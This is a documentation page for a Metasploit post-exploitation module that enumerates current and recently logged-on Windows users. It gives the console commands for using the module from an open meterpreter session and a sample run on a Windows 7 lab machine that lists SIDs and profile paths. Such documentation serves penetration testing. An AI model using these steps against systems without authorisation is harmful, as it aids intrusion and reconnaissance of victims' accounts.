Kenneth LaCroix
1.8 KiB
1.8 KiB
Vulnerable Application
This module will enumerate current and recently logged on Windows users.
Verification Steps
- Start msfconsole
- Get meterpreter session
- Do:
use post/windows/gather/enum_logged_on_users - Do:
set SESSION <session id> - Do:
run
Options
CURRENT
Enumerate currently logged on users. Default: true
RECENT
Enumerate Recently logged on users. Default: true
SESSION
The session to run this module on.
Scenarios
Windows 7 (6.1 Build 7601, Service Pack 1).
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49196) at 2019-12-13 04:36:54 -0700
msf exploit(multi/handler) > use post/windows/gather/enum_logged_on_users
msf post(windows/gather/enum_logged_on_users) > set SESSION 1
SESSION => 1
msf post(windows/gather/enum_logged_on_users) > run
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-21-3113421791-4205713440-112141152-1000 TEST-PC\TEST
[+] Results saved in: /root/.msf4/loot/20191213054456_default_192.168.1.10_host.users.activ_424278.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-3113421791-4205713440-112141152-1000 C:\Users\TEST
[*] Post module execution completed